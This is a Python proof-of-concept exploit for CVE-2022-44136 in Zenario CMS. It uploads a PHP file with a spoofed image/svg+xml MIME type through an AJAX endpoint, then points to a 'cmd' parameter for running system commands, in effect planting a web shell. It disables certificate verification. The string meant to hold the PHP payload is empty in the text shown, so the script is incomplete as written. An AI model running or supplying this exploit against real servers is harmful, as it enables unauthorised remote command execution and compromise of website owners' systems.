#!/usr/bin/env python3 # CVE-2022-44136 Exploit - Zenario CMS Arbitrary File Upload # Author: Ch35h1r3c47 (https://github.com/Ch35h1r3c47) import requests import sys import argparse import urllib3 # Disable warnings for self-signed certificates urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit(target_url, command): """ Attempts to upload a PHP shell to the Zenario CMS instance by spoofing the MIME type as image/svg+xml. """ endpoint = "/zenario/ajax.php?method_call=handlePluginAJAX&cID=1&slideId=0&cType=html&instanceId=20&fileUpload" url = target_url.rstrip('/') + endpoint filename = "debug_module.php" # PHP payload to execute system commands via 'cmd' GET parameter payload = f"" # Constructing the multipart/form-data request # The vulnerability lies in the bypass of extension checks via MIME type spoofing files = { 'Filedata': (filename, payload, 'image/svg+xml') } print(f"[*] Targeting: {target_url}") print(f"[*] Uploading malicious file: {filename}") try: response = requests.post(url, files=files, verify=False, timeout=15) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Server Response:") print("-" * 30) print(response.text) print("-" * 30) print("[!] Check the server response for the uploaded file path.") print(f"[*] Suggested test: /path/to/uploaded/{filename}?cmd={command}") else: print(f"[-] Upload failed. Status Code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Exploit PoC for CVE-2022-44136") parser.add_argument("-u", "--url", required=True, help="Target Base URL (e.g., http://target.com)") parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute (default: whoami)") args = parser.parse_args() exploit(args.url, args.cmd)